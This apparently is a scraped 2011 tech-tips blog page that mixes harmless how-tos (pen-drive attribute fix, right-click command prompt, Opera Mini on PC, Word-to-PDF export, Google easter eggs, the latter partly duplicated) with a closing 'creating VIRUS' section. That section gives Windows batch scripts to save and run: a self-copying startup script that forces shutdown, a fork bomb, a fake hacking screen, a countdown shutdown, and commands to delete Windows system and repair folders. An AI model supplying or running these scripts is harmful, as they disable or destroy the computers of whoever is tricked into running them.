- Click on Start and open the Run mode.
- In the run mode, type cmd and click on [OK] to open the command prompt.
- Now, type the following code in the command prompt:-
attrib -h -r -s /s /d h:\*.*
where 'h' must be replaced by the drive letter of the pen drive. - Now, go to the flash drive and check if all the files or folders are back.
Sunday, July 24, 2011
Steps to solve the problem related to shortcut virus in the pen drive
Thursday, June 16, 2011
Command Prompt on Right-Click

Powered by Command Prompt on Right-ClickMany computer users, specially the programmers, need to launch a command prompt window every once in a while to execute some dos/shell commands. The problem is, when a command prompt window launched, the default path is normally the system path or the user profile's path. The users will then have to do all the "cd" commands to change the directories to the path he/she wants.This trick shows you how to add an option called "Command Prompt" when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you've selected. steps:
|
Wednesday, June 15, 2011
How to use Opera Mini on Your PC

I am here to show how we use opera mini on pc.Now the question is why would anyone use Opera Mini when there’s Opera browser for PC. Well, the answer is simple, if you have a slow internet connection like 56k internet connection or lesser then you’re benefited from this. Using Opera Mini you can load web pages way faster than any other browser.
1. Download the microemulator from here and unzip the package to a specific folder.
2. Now download Opera Mini .jar and .jad files from here and save them in the same folder as it will be easy to browse.
4. Go to Options > Select device> Add…, now navigate to “microemulator/devices” and select “microemu-device-resizable.jar”.
5. Select the “Resizable device” profile you added and click on “Set as default”.
6. Click on the “Resize” button in the lower right corner and enter your preferred size.
7. Go to File> Open JAD and choose the Opera Mini .jad which you had downloaded in Step2.
8. “Opera Mini” will now appear in the list of applications you can start.
9. Click “Start” to launch it.
Convert Word 2007 documents to PDF format
Convert Word 2007 documents to PDF format:
2.Scroll to and click Enable Support For Other File Formats, Such As PDF And XPS.
3.Under “What Do You Want To Do?” click Install And Use The Publish As PDF Or XPS Add-In From Microsoft.
4.When the Web page displays, click Microsoft Save A PDF Or XPS Add-In For 2007 Microsoft Office Programs.
5.Follow the instructions to download the add-in.
To save a Word 2007 document as a PDF file, open the document and follow these steps:
1.Click the Microsoft Office button, move to Save As, and click PDF Or XPS.
2,Click the Options button to set Bookmarks, designate whether you want to save a part of the document or the entire document, and/or exclude document elements from the file. Click OK.
4.Click Publish.
WHAT IS OBML FILES?
OBML file -Opera Mini is a web browser designed primarily for mobile phones, but also for smartphones and personal digital assistants. It uses the Java ME platform and consequently requires that the mobile device be capable of running Java ME applications. Opera Mini is offered free of charge, supported through a partnership between its developer, the Opera Software company, and the search engine company Google. Opera Mini fetches all content through a proxy server that reformats web pages into a format more suitable for small screens. A page is compressed, then delivered to the phone in a markup language called OBML (Opera Binary Markup Language). This compression process makes transfer time faster and the pre-processing also helps compatibility with web pages not designed for mobile phones.
google funs
- 1. Google gravity:- We all have read the Newton’s law of gravity.Does it also apply to google?To test it follow the instructions
- Go to google.com
- Type Google Gravity
- Click on I’m feeling Lucky
Now you will see the effect of gravity on google.The google icon will fall down automatically.You can even pickup and throw google icon anyware.
- 2. Epic Google:- In epic google you will see the font size of google increasing automatically as if it will come out of your computer screen.To use google Follow the instructions
- Go to google.com
- Type Epic Google
- Click on I’m feeling Lucky
- 3. Google Hacker:-want to see how the google homepage will look if it gets hacked .Follow the instructions below
- Go to google.com
- Type Google Hacker
- Click on I’m feeling Lucky
- 4. Annoying Google:- In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Want to try it follow the instructions
- Go to google.com
- Type Annoying Google
- Click on I’m feeling Lucky
If you also know some more cool google tricks then do share with us and our readers by commenting your google tricks
- 3. Google Hacker:-want to see how the google homepage will look if it gets hacked .Follow the instructions below
- Go to google.com
- Type Google Hacker
- Click on I’m feeling Lucky
- 4. Annoying Google:- In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Want to try it follow the instructions
- Go to google.com
- Type Annoying Google
- Click on I’m feeling Lucky
If you also know some more cool google tricks then do share with us and our readers by commenting your google tricks
creating VIRUS
@echo off
title Virus Detected
cls
:a
if not exist "%userprofile%\start menu\programs\startup\virus.ba t" goto b
if exist "%userprofile%\start menu\programs\startup\virus.ba t" goto c
goto a
:b
copy "startup.bat" "%userprofile%\start menu\programs\startup\virus.ba t" >nul
goto c
:c
cls
shutdown -s -t 180 -c "You Got Owned"
exit
save as *.bat
:A
Start
Start
Start
goto A
and save as *.bat (any name.bat)
@echo off
:A
color 0a
echo 7 y h a g 7 2 3 A S h 5 a J 4 F a p h 6 a p h 6 7 2 3 A S 4 g a 0 K 5 j l a f
ping localhost -n 0 > nul
echo f 4 g a 0 K 5 D 1 2 h k 1 O R D K 6 h 2 h k 1 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo D K 6 h 2 h k 1 O R 2 h k 1 O R 4 g a 0 K 5 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo f 4 g a 0 K 5 D 1 2 h k 1 O R D K 6 h 2 h k 1 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo 7 y h a g 7 2 3 A S h 5 a J 4 F a p h 6 a p h 6 7 2 3 A S 4 g a 0 K 5 j l a f
ping localhost -n 0 > nul
goto A
save as *.bat
@echo off
title Timer
set time=60
:loop
set /a time=%time%-1
if %time%==0 goto timesup
echo %time%
ping localhost -n 0 > null
cls
goto loop
:timesup
echo Time is up!
echo •
echo •
echo •
echo Press any key to exit...
pause
shutdown -s -t 30 -c "Your computer is HACKED
save as *.bat
@ echo off del c:\\windows\system 32
@ echo off del c:\\windows\system
@ echo off del c:\\windows\repair
save as (any name).bat